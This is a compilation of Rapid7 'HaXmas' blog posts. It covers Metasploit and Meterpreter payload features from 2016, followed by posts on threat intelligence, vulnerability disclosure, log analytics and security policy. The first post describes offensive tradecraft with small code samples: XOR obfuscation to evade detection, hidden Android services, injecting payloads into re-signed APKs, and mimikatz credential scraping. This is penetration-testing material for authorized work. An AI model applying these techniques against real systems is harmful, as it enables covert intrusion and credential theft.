Rapid7 Blog

12 Days of HaXmas: Meterpreter's new Shiny for 2016

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

Editor's Note: Yes, this is technically an extra post to celebrate the 12th day of HaXmas. We said we liked gifts! Happy new year!

It is once again time to reflect on Metasploit's new payload gifts of 2016 and to make some new resolutions. We had a lot of activity from Metasploit's payload development team, thanks to OJ Reeves, Spencer McIntyre, Tim Wright, Adam Cammack, danilbaz, and all of the other contributors. Here are some of the improvements that made their way into Meterpreter this year.

On the first day of Haxmas, OJ gave us an Obfuscated Protocol

Beginning the new year with a bang (and an ABI break), we added simple obfuscation to the underlying protocol that Meterpreter uses when communicating with Metasploit Framework. While it is just a simple XOR encoding scheme, it stumped a number of detection tools then, and still does today. In the game of detection cat-and-mouse, security vendors often like to pick on the open source project first, since there is practically no reverse engineering required, so it is doubly surprising that this very simple technique continues to work. Just be sure to hide that stager!
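To make the scheme concrete, here is a minimal sketch of this kind of rolling XOR encoding. It is illustrative only: the framing below (a random four-byte key prepended to each packet so the peer can decode it) is an assumption for the example, not Meterpreter's actual wire format.

#include <cstdint>
#include <random>
#include <vector>

// Illustrative XOR obfuscation: generate a random 4-byte key per packet,
// send it in the clear, and XOR the payload against it. This provides no
// confidentiality; it only keeps static byte signatures from matching.
std::vector<uint8_t> xorEncode(const std::vector<uint8_t>& plain) {
    std::random_device rd;
    uint8_t key[4];
    for (auto& k : key)
        k = static_cast<uint8_t>(rd());

    std::vector<uint8_t> out(key, key + 4);  // key travels with the packet
    for (size_t i = 0; i < plain.size(); ++i)
        out.push_back(plain[i] ^ key[i % 4]);
    return out;
}

// Decoding is symmetric: the first four bytes of the packet are the key.
std::vector<uint8_t> xorDecode(const std::vector<uint8_t>& packet) {
    std::vector<uint8_t> plain;
    for (size_t i = 4; i < packet.size(); ++i)
        plain.push_back(packet[i] ^ packet[(i - 4) % 4]);
    return plain;
}

Since the key rides along in cleartext, recovering the plaintext is trivial for anyone who knows the scheme, which makes it all the more surprising that such a simple trick still confuses detection tooling.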
On the second day of Haxmas, Tim gave us two Android Services

Exploiting mobile devices is exciting, but a mobile session does not have the same level of always-on connectivity that a server session does. It is easy to lose a session because a phone went to sleep, there was a loss of network connectivity, or the payload was swapped for some other process. While we can't do much about networking, we did take care of the process swapping by adding the ability for Android Meterpreter to automatically launch as a background service. This means that not only does it start automatically, it does not show up as a running task, and it is able to run in a much more resilient and stealthy way.

On the third day of Haxmas, OJ gave us three Reverse Port Forwards

While exploits have been able to pivot server connections into a remote network through a session, Metasploit did not have the ability for a user to run a local tool and perform the same function. Now you can! Whether it's Python Responder or just a web server, you can now set up a local service that is made visible to your target users via a Meterpreter session. This is a nice complement to the standard port forwarding that has been available with Meterpreter sessions for some time.

On the fourth day of Haxmas, Tim gave us four Festive Wallpapers

Sometimes, when on an engagement, you just want to know 'who did I own?'. Looking around, it is not always obvious, and popping up calc.exe isn't always visible from afar, especially with those new-fangled HiDPI displays. Now Metasploit lets you change the background image on OS X, Windows and Android desktops, so you can update everyone's desktop with a festive picture of your choosing.

On the fifth day of Haxmas, OJ gave us five Powershell Prompts

PowerShell has been Microsoft's gift to both administrators and penetration testers/red teams. While it adds a powerful set of capabilities, it is difficult to run PowerShell as a standalone process using powershell.exe within a Meterpreter session for a number of reasons: it sets up its own console handling, and it can even be disabled or removed from a system. This is where the PowerShell extension for Meterpreter comes in. It not only makes it possible to comfortably run PowerShell commands from Meterpreter directly, you can also interface directly with Meterpreter straight from PowerShell. It uses the capabilities built in to all modern Windows system libraries, so it even works if powershell.exe is missing from the system. Best of all, it never drops a file to disk. If you haven't checked it out already, make it your resolution to try out the Meterpreter PowerShell extension in 2017.

On the sixth day of Haxmas, Tim gave us six SQLite Queries

Mobile exploitation is fun for obtaining real-time data such as GPS coordinates, local WiFi access points, or even looking through the camera. Getting data from applications can be trickier, but many Android applications use SQLite for data storage, and armed with a local privilege escalation (of which there are now several for Android), you can now peruse local application data directly from within an Android session.
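Once you can reach an application's data directory, the analysis itself is ordinary SQLite. As a rough sketch (the database filename, table, and column names below are hypothetical; every app defines its own schema, so inspect it first with .tables and .schema in the sqlite3 shell), dumping rows with the standard sqlite3 C API looks like this:

#include <cstdio>
#include <sqlite3.h>

// Hypothetical example: dump rows from an app database copied out of
// /data/data/<app>/databases/. "messages", "sender" and "body" are
// made-up names for illustration.
int main() {
    sqlite3* db = nullptr;
    if (sqlite3_open("messages.db", &db) != SQLITE_OK) {
        std::fprintf(stderr, "open failed: %s\n", sqlite3_errmsg(db));
        return 1;
    }

    sqlite3_stmt* stmt = nullptr;
    const char* sql = "SELECT sender, body FROM messages ORDER BY rowid;";
    if (sqlite3_prepare_v2(db, sql, -1, &stmt, nullptr) != SQLITE_OK) {
        std::fprintf(stderr, "prepare failed: %s\n", sqlite3_errmsg(db));
        sqlite3_close(db);
        return 1;
    }

    while (sqlite3_step(stmt) == SQLITE_ROW)
        std::printf("%s: %s\n",
                    reinterpret_cast<const char*>(sqlite3_column_text(stmt, 0)),
                    reinterpret_cast<const char*>(sqlite3_column_text(stmt, 1)));

    sqlite3_finalize(stmt);
    sqlite3_close(db);
    return 0;
}

The same code (built with -lsqlite3) works against a database file downloaded from the device, so nothing here needs to run on the handset itself.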
On the seventh day of Haxmas, danilbaz gave us seven Process Images

This one is for the security researchers and developers. Originally part of the Rekall forensic suite, winpmem allows you to automatically dump the memory image of a remote process directly back to your Metasploit console for local analysis. A bit more sophisticated than the memdump command that has shipped with Metasploit since the beginning of time, it works with many versions of Windows, does not require any files to be uploaded, and automatically takes care of any driver loading and setup. Hopefully we will have OS X and Linux versions ready this coming year as well.

On the eighth day of Haxmas, Tim gave us eight Androids in Packages

The Android Meterpreter payload continues to get more full-featured and easier to use. Stageless support means that Android Meterpreter can now run as a fully self-contained APK; without the need for staging, you can save scarce bandwidth in mobile environments. APK injection means you can add Meterpreter as a payload to existing Android applications, even re-signing them with the signature of the original publisher. It even auto-obfuscates itself with Proguard build support.

On the ninth day of Haxmas, zeroSteiner gave us nine Resilient Serpents

Python Meterpreter saw a lot of love this year. In addition to a number of general bugfixes, it is now much more resilient on OS X and Windows platforms. On Windows, it can now automatically identify the Windows version, whether running from Cygwin or as a native application. On OS X, reliability is greatly improved by avoiding some of the more fragile OS X Python extensions that can cause the Python interpreter to crash.

On the tenth day of Haxmas, OJ gave us ten Universal Handlers

Have you ever been confused about what sort of listener you should use on an engagement? Not sure whether you'll be facing 64-bit or 32-bit Linux when you target your hosts? Fret no more: the new universal HTTP payload, aka multi/meterpreter/reverse_http(s), now allows you to just set it and forget it.

On the eleventh day of Haxmas, Adam and Brent gave us eleven Posix Payloads

Two years ago, I started working at Rapid7 as a payloads specialist and wrote a post (/2015/01/05/maxing-meterpreters-mettle) outlining my goals for the year. Shortly after, I got distracted with a million other amazing Metasploit projects, but still kept the code on the back burner. This year, Adam, myself, and many others worked on the first release of Mettle, a new POSIX Meterpreter with an emphasis on portability and performance. Got a SOHO router? Mettle fits. Got an IBM mainframe? Mettle works there too! OS X, FreeBSD, OpenBSD? It works there as well. Look forward to many more improvements in the POSIX and embedded post-exploitation space, powered by the new Mettle payload.

On the twelfth day of Haxmas, OJ gave us twelve Scraped Credentials

Have you heard? Meterpreter now has the latest version of mimikatz integrated as part of the kiwi extension, which allows all sorts of credential-scraping goodness, supporting Windows XP through Server 2016. As a bonus, it still runs completely in memory for stealthy operation. It is now easier than ever to keep Meterpreter up to date with upstream, thanks to some nice new hooking capabilities in Mimikatz itself. Much thanks to gentilkiwi and OJ for the Christmas present.

Hope your 2017 is bright, and look forward to many more gifts this coming year from the Metasploit payloads team!

12 Days of HaXmas: The Gift of Endpoint Visibility and Log Analytics

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

Machine-generated log data is probably the simplest and one of the most-used data sources for everyday use cases such as troubleshooting, monitoring, and security investigations; the list goes on. Since log data records exactly what happens in your software over time, it is extremely useful for understanding what caused an outage or security vulnerability. With technologies like InsightOps, it can also be used to monitor systems in real time by looking at live log data, which can contain anything from resource usage information to error rates to user activity. In short, when used for the right job, log data is extremely powerful... until it's NOT!

When is it not useful to look at logs? When your logs don't contain the data you need. How many times during an investigation have your logs contained enough information to point you in the right direction, but then fell short of giving you the complete picture? Unfortunately, it is quite common to run out of road when looking at log data; if only you had recorded 'user logins', or some other piece of data that was important with hindsight, you could figure out what user installed some malware and your investigation would be complete. Log data, by its very nature, provides an incomplete view of your system, and while log and machine data is invaluable for troubleshooting, investigations and monitoring, it is generally at its most powerful when used in conjunction with other data sources. If you think about it, knowing exactly what to log up front to give you 100% code or system coverage is like trying to predict the future. Thus, when problems arise or investigations are underway, you may not have the complete picture you need to identify the true root cause.

So our gift to you this HaXmas is the ability to generate log data on the fly through our new endpoint technology, InsightOps, which enables you to fill in any missing information during troubleshooting or investigations. InsightOps is pioneering the ability to generate log data on the fly by allowing end users to ask questions of their environment and returning the answers in the form of logs. Essentially, it will allow you to create synthetic logs which can be combined with your traditional log data, giving you the complete picture! It also gives you all this information in one place, so there is no need to combine a bunch of different IT monitoring tools to get the information you need. You will be able to ask anything from 'what processes are running on every endpoint in my environment' to 'what is the memory consumption' of a given process or machine. In fact, our vision is to allow users to ask any question that might be relevant to their environment, so that you will never be left in the dark and never again have to say 'if only I had logged that.'

Interested in trying InsightOps for yourself? Sign up here: https://www.rapid7.com/products/insightops/ Happy HaXmas!

12 Days of HaXmas: New Year's Resolutions for the Threat Intelligence Analyst

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

You may or may not know this about me, but I am kind of an overly optimistic, sunshine-and-rainbows person, especially when it comes to threat intelligence. I love analysis; I love tackling difficult problems, connecting dots, and finding ways to stop malicious actors from successfully attacking our networks. Even though 2016 tried to do a number on us (bears, raccoons, whatever...), I believe that we can come through relatively unscathed, and in 2017 we can make threat intelligence even better by alleviating a lot of confusion and addressing many of the misunderstandings that make it more difficult to integrate threat intelligence into information security operations. In the spirit of the new year, we have compiled a list of Threat Intelligence Resolutions for 2017.

Don't chase shiny threat intel objects

Intelligence work, especially in the cyber realm, is complex, involved, and often time-consuming. The output isn't always earth-shattering: new rules to detect threats, additional indicators to search for during an investigation, a brief to a CISO on emerging threats, situational awareness for the SOC so they better understand the alerts they respond to. Believe it or not, in this media-frenzied world, that is the way it is supposed to be. Things don't have to be sensationalized to be relevant. In fact, many of the things that you will discover through analysis won't be sensational, but they are still important. Don't discount these things or ignore them in order to go chase shiny threat intelligence objects – things that look and sound amazing and important but likely have little relevance to you. Be aware that those shiny things exist, but do not let them take away from the things that are relevant to you. It is also important to note that not everything out there that gets a lot of attention is bad – sometimes something is big because it is a big deal and something you need to focus on. Knowing what is just a shiny object and what is significant comes down to knowing what is important to you and your organization, which brings us to resolution #2.

Identify your threat intelligence requirements

Requirements are the foundation of any intelligence work. Without them, you could spend all of your time finding interesting things about threats without actually contributing to the success of your information security program. There are many types and names for intelligence requirements: national intelligence requirements, standing intelligence requirements, priority intelligence requirements – but they are all the result of a process that identifies what information is important and worth focusing on. As an analyst, you should not be focusing on something that does not directly tie back to an intelligence requirement. If you do not currently have intelligence requirements and are instead going off of some vague guidance like "tell me about bad things on the internet", it is much more likely that you will struggle with resolution #1 and end up chasing the newest and shiniest threat rather than what is important to you and your organization.
There are many different ways to approach threat intelligence requirements: they can be based off of business requirements, previous incidents, current events, or a combination of the above. Scott Roberts and Rick Holland have both written posts to help organizations develop intelligence requirements, and they are excellent places to start with this resolution. (They can be found here and here.)

Be picky about your sources

One of the things we collectively struggled with in 2016 was helping people understand the difference between threat intelligence and threat feeds. Threat intelligence is the result of following the intelligence cycle: from developing requirements, through collection and processing, to analysis and dissemination. For a (much) more in-depth look into the intelligence cycle, read JP 2-0, the publication on Joint Intelligence [PDF]. Threat feeds sit solidly in the collection/processing phase of the intelligence cycle. They are not finished intelligence, but you can't have finished intelligence without collection, and threat feeds can provide the pieces needed to conduct analysis and produce threat intelligence. There are other sources of collection besides feeds, including alerts issued by government agencies or commercial intelligence providers that often contain lists of IOCs. With all of these things it is important to ask questions about the indicators themselves:

Where does the information come from? A honeypot? Is it low interaction or high interaction? Does it include scanning data? Are there specific attack types that they are monitoring for? Is it from an incident response investigation? When did that investigation occur? Are the indicators pulled directly from other threat feeds/sources? If so, which ones?

What is included in the feed? Is it simply IOCs, or is there additional information or context available? Remember, this type of information must still be analyzed, and it can be very difficult to do that without additional context.

When was the information collected? Some types of information are good for long periods, but some are extremely perishable, and it is important to know when the information was collected, not just when you received it. It is also important to know whether you should be using indicators to look back through historical logs or to generate alerts for future activity.

Tactical indicators have dominated the threat intelligence space, and many organizations employ them without a solid understanding of what threats are being conveyed in the feeds or where the information comes from, simply because they are assured that they have the "best threat feed" or the "most comprehensive collection", or maybe the feeds come from a government agency with a fancy logo (although let's be honest, not that fancy). But you should never blindly trust those indicators, or you will end up with a pile of false positives. Or a really bad cup of coffee.

It isn't always easy to find out what is in threat feeds, but it isn't impossible. If threat feeds are part of your intelligence program, then make it your New Year's resolution to understand where the data in the feeds comes from, how often it is updated, where you need to go to find out additional information about any of the indicators in the feeds, and whether or not it will support your intelligence requirements. If you can't find that out, it may be a good idea to start looking for feeds that you know more about.
Look OUTSIDE of the echo chamber

It is amazing how many people you can find to agree with your assessment (or agree with your disagreement of someone else's assessment) if you continue to look to the same individuals or the same circles. It is almost as if there are biases at work. Wait, we know a thing or two about biases! (See: This Graphic Explains 20 Cognitive Biases That Affect Your Decision-Making.) Confirmation bias, bandwagoning, take your pick. When we only expose ourselves to certain things within the cyber threat intelligence realm, we severely limit our understanding of the problems that we are facing and the many different factors that influence them. We also tend to overlook a lot of intelligence literature that can help us understand how we should be addressing those problems. Cyber intelligence is not so new and unique that we cannot learn from traditional intelligence practices. Here are some good resources on intelligence analysis and research:

Kent Center Occasional Papers — Central Intelligence Agency: The Kent Center, a component of the employee-only Sherman Kent School for Intelligence Analysis at CIA University, strives to promote the theory, doctrine, and practice of intelligence analysis.

Congressional Research Service: The Congressional Research Service, a component of the Library of Congress, conducts research and analysis for Congress on a broad range of national policy issues.

The Council on Foreign Relations: The Council on Foreign Relations (CFR) is an independent, nonpartisan membership organization, think tank, and publisher.

Don't be a cotton headed ninny muggins

Now this is where the hopeful optimist in me really comes out. One of the things that bothered me most in 2016 was the needless fighting and arguing over, well, just about everything. Don't get me wrong, we need healthy debate and disagreement in our industry. We need people to challenge our assumptions and help us identify our biases. We need people to fill in any additional details that they may have regarding the analysis in question. What we don't need is people being jerks or discounting analysis without having seen a single piece of information that the analysis was based on. There are a lot of smart people out there, and if someone publishes something you disagree with or question, there are plenty of ways to get in touch with them or voice your opinion in a way that will make our collective understanding of intelligence analysis better.

12 Days of Haxmas: Giving the Gift of Bad News

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

This holiday season, eager little hacker girls and boys around the world will be tearing open their new IoT gadgets and geegaws, and setting to work on evading tamper-evident seals, proxying communications, and reversing firmware, in search of a Haxmas miracle of 0day. But instead of exploiting these newly discovered vulnerabilities, many will instead notice their hearts growing three sizes larger, and wish to disclose these new vulns in a reasonable and coordinated way in order to bring attention to the problem and ultimately see a fix for the discovered issues. In the spirit of HaXmas, then, I'd like to take a moment to talk directly to the good-hearted hackers out there about how one might go about disclosing vulnerabilities in a way that maximizes the chances that your finding will get the right kind of attention.

Keep It Secret, Keep it Santa

First and foremost, I'd urge any researcher to consider the upsides of keeping your disclosure confidential in the short term. While it might be tempting to tweet a 140-character summary publicly to the vendor's alias, dropping this kind of bomb on the social media staff of an electronics company is kind of a jerk move, and only encourages an adversarial relationship from there on out. In the best case, the company most able to fix the issue isn't likely to work with you once you've published, and in the worst, you might trigger a defensive reflex where the vendor refuses to acknowledge the bug at all. Instead, consider writing a probing email to the company's email aliases of security@, secure@, abuse@, support@, and info@, along the lines of, "Hi, I seem to have found a software vulnerability with your product, who can I talk to?" This is likely to get a human response, and you can figure out from there who to talk to about your fresh new vulnerability.

The Spirit of Giving

You could also go a step further and check the vendor's website to see if they offer a bug bounty for discovered issues, or even peek in on HackerOne's community-curated directory of security contacts and bug bounties. For example, searching for Rapid7 gives a pointer to our disclosure policies, contact information, and PGP key. However, be careful when deciding to participate in a bug bounty. While the vast majority of bounty programs out there are well-intentioned, some come with an agreement that you will never, ever, ever, in a million years, ever disclose the bug to anyone else, ever — even if the vendor doesn't deign to acknowledge or fix the issue. This can leave you in a sticky situation, even if you end up getting paid out: if you agree to terms like that, you can limit your options for public disclosure down the line if the fix is non-existent or incomplete. Because of these kinds of constraints, I tend to avoid bug bounties and merely offer up the information for free. It's totally okay to ask about a bounty program, of course, but be sure that you're not phrasing your request in a way that can be read as an extortion attempt — that can be taken as an attack, and again, trigger a negative reaction from the vendor.

No Reindeer Games

In the happy case where you establish communications with the vendor, it's best to be as clear and as direct as possible. If you plan to publish your findings on your blog, say so, and state exactly what and when you plan to publish. Giving vendors deadlines — in a friendly, non-threatening, matter-of-fact way — turns out to be a great motivator for getting your issue prioritized internally. Be prepared to negotiate around the specifics, of course: you might not know exactly how to fix a bug or how long that will take, and at the moment you disclose, they probably don't, either. Most importantly, though, try to avoid over-playing your discovery. Consider what an adversary actually has to do to exploit the bug — maybe they need to be physically close by, or already have an authorized account, or something like that. Being upfront with those details can help frame the risk to other users and can tamp down irrational fears about the bug. Finally, try to avoid blaming the vendor too harshly. Bugs happen — it's inherent in the way we write, assemble, and ship software for general-purpose computers. Assume the vendor isn't staffed with incompetents and imbeciles, and that they actually do care about protecting their customers. Treating your vendor with respect will engender a pretty typical honey-versus-vinegar effect, and you're much more likely to see a fix quickly.

Sing it Loud For All to Hear

Assuming you've hit your clearly stated disclosure deadline, it's time to publish your findings. Again, you're not trying to shame the vendor with your disclosure — you're helping other people make better-informed decisions about the security of their own devices, giving other researchers a specific, documented case study of a vulnerability discovered in a shipping product, and teaching the general public about How Security Works. Again, effectively communicating the vulnerability is critical. Avoid generalities and offer specifics — screenshots, step-by-step instructions on how you found it, and ideally, a Metasploit module to demonstrate the effects of an exploit. Doing this helps move other researchers along, helping them completely understand your unique findings and perhaps apply your learnings to their own efforts. Ideally, there's a fix already available and distributed, and if so, you should clearly state that early on in your disclosure. If there isn't, though, offer up some kind of solution to the problem you've discovered. Nearly always, there is a way to work around the issue through some non-default configuration, a network-level defense, or something like that. Sometimes the best advice is to avoid using the product altogether, but that tends to be the advice of last resort.

Happy HaXmas!

Given the recently enacted DMCA research exemption on consumer devices, I do expect to see an uptick in disclosed issues that center around consumer electronics. This is ultimately a good thing — when people tinker with their own devices, they are more empowered to make better decisions on how a technology can actually affect their lives. The disclosure process, though, can be almost as challenging as the initial hackery of finding and exploiting vulnerabilities in the first place. You're dealing with emotional people who are often unfamiliar with the norms of security research, and you may well be the first security expert they've talked to. Make the most of your newfound status as a security ambassador, and try to be helpful when delivering your bad news.

12 Days of HaXmas: Giving Rapid7 Customers a Way to Share Their Voice

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

In early 2014, we formally launched a program called Rapid7 Voice. It's an advocacy program that enables our outstanding customers to build their personal brand while guiding Rapid7 innovation. The Voice program gives you the opportunity to become involved with Rapid7 at whatever commitment level is right for you. This program is a unique opportunity for Rapid7 customers to help influence product development and become more involved with the tools they are using. Participants also get the chance to network with peers, speak at industry events, and engage with other customers in mentorship roles.

To supplement the Voice program, we have VoiceUp, an online customer advocacy engagement hub which gives customers the opportunity to be the first to learn about Rapid7's product roadmap and the power to influence innovation in development. Members also get first access to news, content, and engagement opportunities. In the hub, customers can earn points for all their completed engagement “activities,” big or small, and redeem them for great rewards.

With both Voice and VoiceUp, the focus is not only to actively involve customers in the development of our products and services through their feedback and insights, but also to help them build a personal brand. Advocates are invited to participate in a variety of engagement opportunities to gain more experience and exposure within the industry. Here are some examples:

Webcast: Overcoming the innovation paradox in 2017, with Brian Gray, Bo Weaver, Russ Verbofsky and Westley Roberts
Podcast: Security Nation Podcast with Bo Weaver
Speaking: Scott Meyer on the UNITED 2016 IoT Panel Session
Influence: Feature Update Influenced by Rapid7 Advocates
Feedback: UX Team Focusing on Advocate Feedback

There are countless ways to engage with us here at Rapid7, and we want every customer to have a great experience. Take it from these advocates:

“[VoiceUp allows me] to interact with Rapid7 in a way that not many other companies have [including] reading what others have written, additional awareness of security news articles on Rapid7, and learning about current events. Rapid7 seems to have a vested interest in using the information provided to benefit the users of VoiceUp.” - Brian Haessly, IT Security Engineer

“You can't complain about a product that allows you to have an input into it. It is nice to have a company as large as Rapid7 wanting to hear what the end user wants to say and not just building it the way the company wants with the "that's the way it is" attitude.” - Eric Pirolli, IT Security Analyst at The University of Toledo

“I've joined the Rapid7 VoiceUp hub so I may have an opportunity to be involved in something bigger than myself. I feel I am part of an evolving industry that is meant to help and protect. I have had an opportunity to speak with the product team, been part of a webcast, and engaged with other security professionals. But my biggest reason to stay an active member of VoiceUp is to help others.” - Jack Voth, Sr. Director of Information Technology at Algenol Biotech

If you want to join these Rapid7 Advocates and get involved, visit https://www.rapid7.com/about/rapid7-voice/ to read more about the program and sign up today.

12 Days of HaXmas: Metasploit Framework 2016 Overview

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

Breaking Records and Breaking Business

2016 brought plenty of turmoil, and InfoSec was no exception:

Largest data breach: the largest breach ever, affecting more than 1 billion Yahoo users. And they were not alone: Oracle, LinkedIn, the Department of Justice, SnapChat, Verizon, DropBox, the IRS — many organizations experienced, or discovered (or finally revealed the true extent of...), massive breaches this year.

Record-breaking denial of service attacks: law enforcement efforts targeting DDoS-as-a-Service providers are encouraging, but Mirai achieved record-breaking DDoS attacks this year. It turns out those easy-to-take-for-granted devices joining the Internet of Things in droves can pack quite a punch.

Ransomware: the end of 2015 saw a meteoric rise in the prevalence of ransomware, and this continued in 2016. Healthcare and other targeted industries have faced 2-4x as many related attacks this year, some via increased coverage of ransomware in exploit kits, but mostly through plain old phishing.

Businesses and individuals continue to face new and increasing threats in keeping their essential systems and data secure. A static defense will not suffice: they must increase in both awareness and capability regularly in order to form a robust security program. Metasploit Framework has grown in many ways during 2016, both through the broader community and through Rapid7 support. Let's look back through some of the highlights:

More exploits

A surprisingly wide range of exploits was added to Metasploit Framework in 2016:

Network management: NetGear, OpenNMS, webNMS, Dell, and more
Monitoring and backup: Nagios XI, Exagrid
Security: ClamAV, TrendMicro, Panda, Hak5 Pineapple, Dell SonicWall, Symantec -- and Metasploit itself!
Mainframes, SCADA dashboards
Exploit kits: Dark Comet, Phoenix
ExtraBACON; StageFright
Content management/web applications: Joomla, TikiWiki, Ruby on Rails, Drupal, WordPress forms
Docker, the Linux kernel, SugarCRM, the Oracle test suite, Apache Struts, exim, Postgres, and many more!

More flexibility

Metasploit Framework provides many supporting tools aside from those designed to get a session on a target. These help in collecting information from a wide variety of systems, staying resilient to unknown and changing network environments, and looking like you belong. Some expansions to the toolbox in 2016 included:

Additional persistence options: cron jobs, SSH keys, and boot services
Improvements to payload handlers, including a universal handler
Android: inject Meterpreter into an existing APK and re-sign it
Mettle: a new native POSIX Meterpreter
PowerShell: run scripts even if PowerShell isn't installed on the target, upload to PowerShell Empire, and more
Data collection: Amazon EC2 metadata, OS X Messages, subdomain enumeration, trusted Office locations — even generate an org chart from Active Directory.

By the Numbers

Nearly 400 people have contributed code to Metasploit Framework during its history. And speaking of history: Metasploit Framework turned 13 this year! Long, long ago, in a console (probably not too) far away:

Metasploit Framework 2.2 - 30 exploits

Has much changed in the last 12 years? Indeed!

Metasploit Framework 4.13.8 - 1607 exploits

In 2016, Metasploit contributors added over 150 new modules. Metasploit Framework's growth is powered by Rapid7, and especially by the community of users that give back by helping the project in a variety of ways, from landing pull requests to finding flags. Topping the list of code contributors in 2016: Wei Chen (sinn3r), Brent Cook, William Vu (wvu), Dave Maloney (thelightcosine), h00die, OJ Reeves, nixawk, James Lee (egypt), Jon Hart, Tim Wright, Brendan Watters, Adam Cammack, Pedro Ribeiro, Josh Hale (sn0wfa11), and Nate Caroe (TheNaterz).

The Metasploit Framework GitHub project is approaching 4700 forks and ranks in the top 10 for Ruby projects once again. It's also the second most starred security project on GitHub. None of this would have been possible if not for the dedication and drive of the Metasploit community. Together, we can continue to highlight flaws in existing systems and better test the essential software of tomorrow. John Locke voiced in 1693 what open source security supporters continue to know well today: "The only fence against the world is a thorough knowledge of it."

So what about you?

New to Metasploit? Check out the wiki for usage info and lots more!
Need a refresher? Check out the new module documentation approach, including usage examples.
Get the latest Metasploit Framework and try it out against Metasploitable3!
Hop on the #metasploit channel on IRC to ask questions, or hit us up on Twitter.
Want to contribute? Thank you! There are many forms contribution can take, and whether adding module documentation, fixing a bug, filing a bug, sharing an idea, or putting up a pull request for your first exploit module: these are all valuable!

12 Days of HaXmas: Year-End Policy Comment Roundup

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

On the seventh day of Haxmas, the Cyber gave to me: a list of seven Rapid7 comments on government policy proposals! Oh, 'tis a magical season.

It was an active 2016 for Rapid7's policy team. When government agencies and commissions proposed rules or guidelines affecting security, we often submitted formal "comments" advocating for sound cybersecurity policies and greater protection of security researchers. These comments are typically a cross-team effort, reflecting the input of our policy, technical, and industry experts, and are submitted with the goal of helping government better protect users and researchers and advance a strong cybersecurity ecosystem. Below is an overview of the comments we submitted over the past year. This list does not encompass the entirety of our engagement with government bodies, only the formal written comments we issued in 2016. Without further ado:

1. Comments to the National Institute of Standards and Technology (NIST), Feb. 23: NIST asked for public feedback on its Cybersecurity Framework for Improving Critical Infrastructure Cybersecurity. The Framework is a great starting point for developing risk-based cybersecurity programs, and Rapid7's comments expressed support for it. Our comments also urged updates to better account for user-based attacks and ransomware, to include vulnerability disclosure and handling policies, and to expand the Framework beyond critical infrastructure. We also urged NIST to encourage greater use of multi-factor authentication and more productive information sharing. Our comments are available here [PDF]: https://rapid7.com/globalassets/_pdfs/rapid7-comments/rapid7-comments-to-nist-framework-022316.pdf

2. Comments to the Copyright Office, Mar. 3: The Copyright Office asked for input on its (forthcoming) study of Section 1201 of the DMCA. Teaming up with Bugcrowd and HackerOne, Rapid7 submitted comments that detailed how Section 1201 creates liability for good-faith security researchers without protecting copyright, and suggested specific reforms to improve the Copyright Office's process of creating exemptions to Section 1201. Our comments are available here [PDF]: https://rapid7.com/globalassets/_pdfs/rapid7-comments/rapid7-bugcrowd--hackerone-joint-comments-to-us-copyright-office-s…

3. Comments to the Food and Drug Administration (FDA), Apr. 25: The FDA requested comments on its postmarket guidance for cybersecurity of medical devices. Rapid7 submitted comments praising the FDA's holistic view of the cybersecurity lifecycle, use of the NIST Framework, and recommendation that companies adopt vulnerability disclosure policies. Rapid7's comments urged FDA guidance to include more objective risk assessment and more robust security update guidelines. Our comments are available here [PDF]: https://rapid7.com/globalassets/_pdfs/rapid7-comments/rapid7-comments-to-fda-draft-guidance-for-postmarket-management-of…

4. Comments to the Dept. of Commerce's National Telecommunications and Information Administration (NTIA), Jun. 1: NTIA asked for public comments for its (forthcoming) "green paper" examining a wide range of policy issues related to the Internet of Things. Rapid7's comprehensive comments detailed – among other things – specific technical and policy challenges for IoT security, including insufficient update practices, unclear device ownership, opaque supply chains, the need for security researchers, and the role of strong encryption. Our comments are available here [PDF]: https://rapid7.com/globalassets/_pdfs/rapid7-comments/rapid7-comments-to-ntia-internet-of-things-rfc-060116.pdf

5. Comments to the President's Commission on Enhancing National Cybersecurity (CENC), Sep. 9: The CENC solicited comments as it drafted its comprehensive report on steps the government can take to improve cybersecurity in the next few years. Rapid7's comments urged the government to focus on known vulnerabilities in critical infrastructure, protect strong encryption from mandates to weaken it, leverage independent security researchers as a workforce, encourage adoption of vulnerability disclosure and handling policies, promote multi-factor authentication, and support formal rules for government disclosure of vulnerabilities. Our comments are available here [PDF]: https://rapid7.com/globalassets/_pdfs/rapid7-comments/rapid7-comments-to-cenc-rfi-090916.pdf

6. Comments to the Copyright Office, Oct. 28: The Copyright Office asked for additional comments for its (forthcoming) study of Section 1201 reforms. This round of comments focused on recommending specific statutory changes to the DMCA to better protect researchers from liability for good-faith security research that does not infringe copyright. Rapid7 submitted these comments jointly with Bugcrowd, HackerOne, and Luta Security. The comments are available here [PDF]: https://rapid7.com/globalassets/_pdfs/rapid7-comments/rapid7-bugcrowd-hackerone-luta-security-joint-comments-to-copyrigh…

